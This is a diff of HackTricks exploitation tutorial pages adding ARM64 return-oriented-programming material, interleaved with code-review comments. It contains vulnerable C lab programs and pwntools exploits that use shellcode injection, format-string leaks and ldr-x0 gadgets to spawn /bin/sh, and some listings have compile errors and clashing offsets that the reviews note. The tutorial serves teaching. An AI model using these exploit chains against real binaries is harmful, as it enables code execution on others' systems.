## Protections Against ROP
|
||||||
|
|
||||||
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution.
|
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution.
|
||||||
|
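Review bot: the new `## ROP chain in ARM64 Example` section contains no example; it only links to the ARM64 basics page under a "Basics & Calling conventions" subheading. Either add the ARM64 chain the heading promises (the arm64 sub-pages this commit adds for ret2win, stack shellcode and ret2syscall could be referenced from here) or rename the heading until the example exists. Minor: the `###` subheading wraps its text in bold, while `## Protections Against ROP` and the other headings in this hunk do not.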
@ -177,8 +189,8 @@ Notice that ROP is just a technique in order to execute arbitrary code. Based in
|
||||||
|
|
||||||
* **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands.
|
* **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands.
|
||||||
|
|
||||||
{% content-ref url="rop-syscall-execv.md" %}
|
{% content-ref url="rop-syscall-execv/" %}
|
||||||
[rop-syscall-execv.md](rop-syscall-execv.md)
|
[rop-syscall-execv](rop-syscall-execv/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
* **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP).
|
* **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP).
|
||||||
|
@ -192,6 +204,8 @@ Notice that ROP is just a technique in order to execute arbitrary code. Based in
|
||||||
* [https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions)
|
* [https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions)
|
||||||
* [https://guyinatuxedo.github.io/15-partial\_overwrite/hacklu15\_stackstuff/index.html](https://guyinatuxedo.github.io/15-partial\_overwrite/hacklu15\_stackstuff/index.html)
|
* [https://guyinatuxedo.github.io/15-partial\_overwrite/hacklu15\_stackstuff/index.html](https://guyinatuxedo.github.io/15-partial\_overwrite/hacklu15\_stackstuff/index.html)
|
||||||
* 64 bit, Pie and nx enabled, no canary, overwrite RIP with a `vsyscall` address with the sole purpose or return to the next address in the stack which will be a partial overwrite of the address to get the part of the function that leaks the flag
|
* 64 bit, Pie and nx enabled, no canary, overwrite RIP with a `vsyscall` address with the sole purpose or return to the next address in the stack which will be a partial overwrite of the address to get the part of the function that leaks the flag
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/)
|
||||||
|
* arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
|
|
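Review bot: the new reference bullet `* arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack` understates what the linked write-up does; going by its title the chain calls `mprotect` on the stack page to make it RWX and then returns into shellcode placed there, so say "ROP chain calling `mprotect`" and cross-link the `mprotect` hint that this same commit edits on the ret2syscall page. It is also worth one clause that `mprotect` needs a page-aligned address plus the length and protection flags in the argument registers, since setting those up is the whole work of the chain.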
@ -25,7 +25,7 @@ Therefore, it's possible to **fake all these structures** to make the dynamic li
|
||||||
Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** , having it **resolve the address of `system`** in the fake structures and **calling this address** with the address to `$'/bin/sh'`.
|
Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** , having it **resolve the address of `system`** in the fake structures and **calling this address** with the address to `$'/bin/sh'`.
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv.md) or [SROP](srop-sigreturn-oriented-programming.md)) and there are't ways to leak libc addresses.
|
This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/) or [SROP](srop-sigreturn-oriented-programming.md)) and there are't ways to leak libc addresses.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
You can find a better explanation about this technique in the second half of the video:
|
You can find a better explanation about this technique in the second half of the video:
|
||||||
|
|
|
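Review bot: the edited hint line still reads "useful specially if there aren't syscall gadgets ... and there are't ways to leak libc addresses"; since the line is already being touched for the link, fix "specially" to "especially" and "are't" to "aren't". The new `rop-syscall-execv/` target needs the same README.md and `SUMMARY.md` follow-up as the other retargeted links in this commit.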
@ -92,7 +92,6 @@ target.sendline(payload)
|
||||||
|
|
||||||
# Drop to an interactive shell
|
# Drop to an interactive shell
|
||||||
target.interactive()
|
target.interactive()
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
## Ret2reg
|
## Ret2reg
|
||||||
|
@ -107,6 +106,93 @@ You can find some examples here: 
|
||||||
* [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c)
|
* [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c)
|
||||||
* **`strcpy`** will be store in **`eax`** the address of the buffer where the shellcode was stored and **`eax`** isn't being overwritten, so it's possible use a `ret2eax`.
|
* **`strcpy`** will be store in **`eax`** the address of the buffer where the shellcode was stored and **`eax`** isn't being overwritten, so it's possible use a `ret2eax`.
|
||||||
|
|
||||||
|
## ARM64
|
||||||
|
|
||||||
|
### Ret2sp
|
||||||
|
|
||||||
|
In ARM64 there **aren't** instructions allowing to **jump to the SP registry**. It might be possible to find a gadget that **moves sp to a registry and then jumps to that registry**, but in the libc of my kali I couldn't find any gadget like that:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
for i in `seq 1 30`; do
|
||||||
|
ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)";
|
||||||
|
done
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
The only ones I discovered would change the value of the registry where sp was copied before jumping to it (so it would become useless):
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1221).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Ret2reg
|
||||||
|
|
||||||
|
If a registry has an interesting address it's possible to jump to it just finding the adequate instruction. You could use something like:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei " b[a-z]* x[0-9][0-9]?";
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
In ARM64, it's **`x0`** who stores the return value of a function, so it could be that x0 stores the address of a buffer controlled by the user with a shellcode to execute.
|
||||||
|
|
||||||
|
Example code:
|
||||||
|
|
||||||
|
```c
|
||||||
|
// clang -o ret2x0 ret2x0.c -no-pie -fno-stack-protector -Wno-format-security -z execstack
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
void do_stuff(int do_arg){
|
||||||
|
if (do_arg == 1)
|
||||||
|
__asm__("br x0");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
char* vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
fgets(buffer, sizeof(buffer)*3, stdin);
|
||||||
|
return buffer;
|
||||||
|
}
|
||||||
|
|
||||||
|
int main(int argc, char **argv) {
|
||||||
|
char* b = vulnerable_function();
|
||||||
|
do_stuff(2)
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Checking the disassembly of the function it's possible to see that the **address to the buffer** (vulnerable to bof and **controlled by the user**) is **stored in `x0`** before returning from the buffer overflow:
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1222).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
It's also possible to find the gadget **`br x0`** in the **`do_stuff`** function:
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1223).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
We will use that gadget to jump to it because the binary is compile **WITHOUT PIE.** Using a pattern it's possible to see that the **offset of the buffer overflow is 80**, so the exploit would be:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
p = process('./ret2x0')
|
||||||
|
elf = context.binary = ELF('./ret2x0')
|
||||||
|
|
||||||
|
stack_offset = 72
|
||||||
|
shellcode = asm(shellcraft.sh())
|
||||||
|
br_x0 = p64(0x4006a0) # Addr of: br x0;
|
||||||
|
payload = shellcode + b"A" * (stack_offset - len(shellcode)) + br_x0
|
||||||
|
|
||||||
|
p.sendline(payload)
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
{% hint style="warning" %}
|
||||||
|
If instead of `fgets` it was used something like **`read`**, it would have been possible to bypass PIE also by **only overwriting the last 2 bytes of the return address** to return to the `br x0;` instruction without needing to know the complete address.\
|
||||||
|
With `fgets` it doesn't work because it **adds a null (0x00) byte at the end**.
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
## Protections
|
## Protections
|
||||||
|
|
||||||
* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it.
|
* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it.
|
||||||
|
|
|
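Review bot: the new C example does not compile as given, `do_stuff(2)` in `main` is missing its semicolon, so the `clang -o ret2x0 ...` line in the comment fails before anyone reaches the exploit. Two more consistency points in the same block: the text says "the offset of the buffer overflow is 80" while the exploit uses `stack_offset = 72` (72 is what `char buffer[64]` plus the saved x29 gives, so the prose is the one to fix), and the gadget search `grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)"` uses a character class, which matches a single letter out of `m o v | a d`, not the words; it should be `(mov|add) x${i}, sp`. In the exploit, `fgets` stops at the first newline and adds a terminator, so the shellcode must contain no `0x0a` byte and must fit in the 72 bytes; an `assert len(shellcode) <= stack_offset and b"\n" not in shellcode` saves readers a silent crash. The hard-coded `br_x0 = p64(0x4006a0)` can be looked up with `next(elf.search(asm("br x0")))` once `context.binary` is set. In the closing hint, the 2-byte partial overwrite leaves 16 bits under attacker control of which the low 12 are fixed by page alignment, so 4 bits (1 in 16) still need to be brute-forced; say so, and note that with `read` you would use `send`, not `sendline`, or the newline lands in the third byte. Finally, "registry" should be "register" throughout this addition.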
@ -137,9 +137,21 @@ Check the example from:
|
||||||
[..](../)
|
[..](../)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## ARM64 Ret2lib Example
|
||||||
|
|
||||||
|
In the case of ARM64, the ret instruction jumps to whereber the x30 registry is pointing and not where the stack registry is pointing. So it's a bit more complicated.
|
||||||
|
|
||||||
|
Also in ARM64 an instruction does what the instruction does (it's not possible to jump in the middle of instructions and transform them in new ones).
|
||||||
|
|
||||||
|
Check the example from:
|
||||||
|
|
||||||
|
{% content-ref url="ret2lib-+-printf-leak-arm64.md" %}
|
||||||
|
[ret2lib-+-printf-leak-arm64.md](ret2lib-+-printf-leak-arm64.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Ret-into-printf (or puts)
|
## Ret-into-printf (or puts)
|
||||||
|
|
||||||
This allows to **leak information from the process** by calling `printf`/`puts` with some specific data placed as an argument.
|
This allows to **leak information from the process** by calling `printf`/`puts` with some specific data placed as an argument. For example putting the address of `puts` in the GOT into an execution of `puts` will **leak the address of `puts` in memory**.
|
||||||
|
|
||||||
## Ret2printf
|
## Ret2printf
|
||||||
|
|
||||||
|
|
|
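Review bot: the new paragraph `In the case of ARM64, the ret instruction jumps to whereber the x30 registry is pointing` has typos ("wherever", "register") and skips the step that makes a stack overflow still work: the callee epilogue reloads x30 from the stack (`ldp x29, x30, [sp], #N`) right before `ret`, so overwriting that saved slot is what hijacks control. The second paragraph ("an instruction does what the instruction does") should state the actual property: AArch64 instructions are fixed 4-byte and 4-byte aligned, so there are no unintended gadgets from jumping into the middle of an instruction as on x86, and there are no `pop` gadgets either, which is why the ARM64 examples in this commit use `ldp`/`ldr ..., [sp, #off]` gadgets instead. In the Ret-into-printf addition, "putting the address of `puts` in the GOT into an execution of `puts`" reads better as "calling `puts` with the GOT entry of `puts` as its argument".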
@ -32,6 +32,10 @@ To the address indicated by One Gadget you need to **add the base address where
|
||||||
One Gadget is a **great help for Arbitrary Write 2 Exec techniques** and might **simplify ROP** **chains** as you only need to call one address (and fulfil the requirements).
|
One Gadget is a **great help for Arbitrary Write 2 Exec techniques** and might **simplify ROP** **chains** as you only need to call one address (and fulfil the requirements).
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
|
### ARM64
|
||||||
|
|
||||||
|
The github repo mentions that **ARM64 is supported** by the tool, but when running it in the libc of a Kali 2023.3 **it doesn't find any gadget**.
|
||||||
|
|
||||||
## Angry Gadget
|
## Angry Gadget
|
||||||
|
|
||||||
From the [**github repo**](https://github.com/ChrisTheCoolHut/angry\_gadget): Inspired by [OneGadget](https://github.com/david942j/one\_gadget) this tool is written in python and uses [angr](https://github.com/angr/angr) to test constraints for gadgets executing `execve('/bin/sh', NULL, NULL)`\
|
From the [**github repo**](https://github.com/ChrisTheCoolHut/angry\_gadget): Inspired by [OneGadget](https://github.com/david942j/one\_gadget) this tool is written in python and uses [angr](https://github.com/angr/angr) to test constraints for gadgets executing `execve('/bin/sh', NULL, NULL)`\
|
||||||
|
|
|
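Review bot: the new ARM64 note `it doesn't find any gadget` is not reproducible as written; record the `one_gadget` version, the libc build (`/usr/lib/aarch64-linux-gnu/libc.so.6` and its version string) and the exact command, and retry with `one_gadget -l 1 <libc>` since the default output level hides lower-probability candidates. If that still yields nothing, say so explicitly and point readers at the ARM64 ret2lib and ret2syscall chains this commit adds as the fallback.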
@ -0,0 +1,241 @@
|
||||||
|
# Ret2lib + Printf leak - arm64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Ret2lib - NX bypass with ROP (no ASLR)
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
|
||||||
|
void bof()
|
||||||
|
{
|
||||||
|
char buf[100];
|
||||||
|
printf("\nbof>\n");
|
||||||
|
fgets(buf, sizeof(buf)*3, stdin);
|
||||||
|
}
|
||||||
|
|
||||||
|
void main()
|
||||||
|
{
|
||||||
|
printfleak();
|
||||||
|
bof();
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without canary:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector
|
||||||
|
# Disable aslr
|
||||||
|
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||||||
|
```
|
||||||
|
|
||||||
|
### Find offset
|
||||||
|
|
||||||
|
### x30 offset
|
||||||
|
|
||||||
|
Creating a pattern with **`pattern create 200`**, using it, and checking for the offset with **`pattern search $x30`** we can see that the offset is **`108`** (0x6c).
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1215).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Taking a look to the dissembled main function we can see that we would like to **jump** to the instruction to jump to **`printf`** directly, whose offset from where the binary is loaded is **`0x860`**:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1216).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Find system and `/bin/sh` string
|
||||||
|
|
||||||
|
As the ASLR is disabled, the addresses are going to be always the same:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1219).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Find Gadgets
|
||||||
|
|
||||||
|
We need to have in **`x0`** the address to the string **`/bin/sh`** and call **`system`**.
|
||||||
|
|
||||||
|
Using rooper an interesting gadget was found:
|
||||||
|
|
||||||
|
```
|
||||||
|
0x000000000006bdf0: ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
|
||||||
|
```
|
||||||
|
|
||||||
|
This gadget will load `x0` from **`$sp + 0x18`** and then load the addresses x29 and x30 form sp and jump to x30. So with this gadget we can **control the first argument and then jump to system**.
|
||||||
|
|
||||||
|
### Exploit
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
from time import sleep
|
||||||
|
|
||||||
|
p = process('./rop') # For local binary
|
||||||
|
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
|
||||||
|
libc.address = 0x0000fffff7df0000
|
||||||
|
binsh = next(libc.search(b"/bin/sh")) #Verify with find /bin/sh
|
||||||
|
system = libc.sym["system"]
|
||||||
|
|
||||||
|
def expl_bof(payload):
|
||||||
|
p.recv()
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
# Ret2main
|
||||||
|
stack_offset = 108
|
||||||
|
ldr_x0_ret = p64(libc.address + 0x6bdf0) # ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
|
||||||
|
|
||||||
|
x29 = b"AAAAAAAA"
|
||||||
|
x30 = p64(system)
|
||||||
|
fill = b"A" * (0x18 - 0x10)
|
||||||
|
x0 = p64(binsh)
|
||||||
|
|
||||||
|
payload = b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
p.interactive()
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
## Ret2lib - NX, ASL & PIE bypass with printf leaks from the stack
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
|
||||||
|
void printfleak()
|
||||||
|
{
|
||||||
|
char buf[100];
|
||||||
|
printf("\nPrintf>\n");
|
||||||
|
fgets(buf, sizeof(buf), stdin);
|
||||||
|
printf(buf);
|
||||||
|
}
|
||||||
|
|
||||||
|
void bof()
|
||||||
|
{
|
||||||
|
char buf[100];
|
||||||
|
printf("\nbof>\n");
|
||||||
|
fgets(buf, sizeof(buf)*3, stdin);
|
||||||
|
}
|
||||||
|
|
||||||
|
void main()
|
||||||
|
{
|
||||||
|
printfleak();
|
||||||
|
bof();
|
||||||
|
}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile **without canary**:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
clang -o rop rop.c -fno-stack-protector -Wno-format-security
|
||||||
|
```
|
||||||
|
|
||||||
|
### PIE and ASLR but no canary
|
||||||
|
|
||||||
|
* Round 1:
|
||||||
|
* Leak of PIE from stack
|
||||||
|
* Abuse bof to go back to main
|
||||||
|
* Round 2:
|
||||||
|
* Leak of libc from the stack
|
||||||
|
* ROP: ret2system
|
||||||
|
|
||||||
|
### Printf leaks
|
||||||
|
|
||||||
|
Setting a breakpoint before calling printf it's possible to see that there are addresses to return to the binary in the stack and also libc addresses:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1212).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Trying different offsets, the **`%21$p`** can leak a binary address (PIE bypass) and **`%25$p`** can leak a libc address:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1220).png" alt="" width="440"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Subtracting the libc leaked address with the base address of libc, it's possible to see that the **offset** of the **leaked address from the base is `0x49c40`.**
|
||||||
|
|
||||||
|
### x30 offset
|
||||||
|
|
||||||
|
See the previous example as the bof is the same.
|
||||||
|
|
||||||
|
### Find Gadgets
|
||||||
|
|
||||||
|
Like in the previous example, we need to have in **`x0`** the address to the string **`/bin/sh`** and call **`system`**.
|
||||||
|
|
||||||
|
Using rooper another interesting gadget was found:
|
||||||
|
|
||||||
|
```
|
||||||
|
0x0000000000049c40: ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
|
||||||
|
```
|
||||||
|
|
||||||
|
This gadget will load `x0` from **`$sp + 0x78`** and then load the addresses x29 and x30 form sp and jump to x30. So with this gadget we can **control the first argument and then jump to system**.
|
||||||
|
|
||||||
|
### Exploit
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
from time import sleep
|
||||||
|
|
||||||
|
p = process('./rop') # For local binary
|
||||||
|
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
|
||||||
|
|
||||||
|
def leak_printf(payload, is_main_addr=False):
|
||||||
|
p.sendlineafter(b">\n" ,payload)
|
||||||
|
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
|
||||||
|
if is_main_addr:
|
||||||
|
response = response[:-4] + b"0000"
|
||||||
|
return int(response, 16)
|
||||||
|
|
||||||
|
def expl_bof(payload):
|
||||||
|
p.recv()
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
# Get main address
|
||||||
|
main_address = leak_printf(b"%21$p", True)
|
||||||
|
print(f"Bin address: {hex(main_address)}")
|
||||||
|
|
||||||
|
# Ret2main
|
||||||
|
stack_offset = 108
|
||||||
|
main_call_printf_offset = 0x860 #Offset inside main to call printfleak
|
||||||
|
print("Going back to " + str(hex(main_address + main_call_printf_offset)))
|
||||||
|
ret2main = b"A"*stack_offset + p64(main_address + main_call_printf_offset)
|
||||||
|
expl_bof(ret2main)
|
||||||
|
|
||||||
|
# libc
|
||||||
|
libc_base_address = leak_printf(b"%25$p") - 0x26dc4
|
||||||
|
libc.address = libc_base_address
|
||||||
|
print(f"Libc address: {hex(libc_base_address)}")
|
||||||
|
binsh = next(libc.search(b"/bin/sh"))
|
||||||
|
system = libc.sym["system"]
|
||||||
|
|
||||||
|
# ret2system
|
||||||
|
ldr_x0_ret = p64(libc.address + 0x49c40) # ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
|
||||||
|
|
||||||
|
x29 = b"AAAAAAAA"
|
||||||
|
x30 = p64(system)
|
||||||
|
fill = b"A" * (0x78 - 0x10)
|
||||||
|
x0 = p64(binsh)
|
||||||
|
|
||||||
|
payload = b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
|
||||||
|
p.sendline(payload)
|
||||||
|
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
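Review bot: the first C listing does not compile, its `main` calls `printfleak()` but that function is only defined in the second listing; either drop the call in the no-ASLR variant or include the function (and use `int main(void)` in both). The compile line produces `rop-no-aslr` while the exploit opens `process('./rop')`, and the exploit carries leftovers from the second example: the `# Ret2main` comment, the unused `expl_bof` helper and the unused `from time import sleep`. The paragraph about returning to the `printf` call at offset `0x860` also belongs to the PIE example, not here, and the empty `### Find offset` heading followed by `### x30 offset` at the same level should be merged. More important, the prose says the libc leak sits at `0x49c40` from the base but the exploit subtracts `0x26dc4`; `0x49c40` is the gadget offset quoted right below it, so the leak paragraph copied the wrong number and the two must be reconciled. In `leak_printf`, `response[:-4] + b"0000"` masks the low 16 bits, so `main_address` is really the PIE image base; rename it (e.g. `bin_base`) and state the assumption that the leaked return address lies within the first 64 KiB of the image. The hard-coded `libc.address = 0x0000fffff7df0000` should be confirmed with `vmmap` or `info proc mappings` rather than given silently. Typos: "rooper" is Ropper, "ASL" in the heading is ASLR, "form sp" is "from sp".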
@ -28,7 +28,7 @@ In order to prepare the call for the **syscall** it's needed the following confi
|
||||||
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
|
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../stack-overflow/stack-shellcode.md).
|
Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../../stack-overflow/stack-shellcode/).
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
## Register gadgets
|
## Register gadgets
|
||||||
|
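Review bot: the extra `../` is right because this page moves one level down into `rop-syscall-execv/`, but the target also changes from the file `stack-shellcode.md` to the directory `stack-shellcode/`; confirm that directory has a README.md and is listed in `SUMMARY.md`, or the hint's link breaks.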
@ -123,8 +123,8 @@ rop += writeGadget #Address to: mov qword ptr [rax], rdx
|
||||||
|
|
||||||
If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack:
|
If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack:
|
||||||
|
|
||||||
{% content-ref url="srop-sigreturn-oriented-programming.md" %}
|
{% content-ref url="../srop-sigreturn-oriented-programming.md" %}
|
||||||
[srop-sigreturn-oriented-programming.md](srop-sigreturn-oriented-programming.md)
|
[srop-sigreturn-oriented-programming.md](../srop-sigreturn-oriented-programming.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Exploit Example
|
## Exploit Example
|
|
@ -0,0 +1,151 @@
|
||||||
|
# Ret2syscall - ARM64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
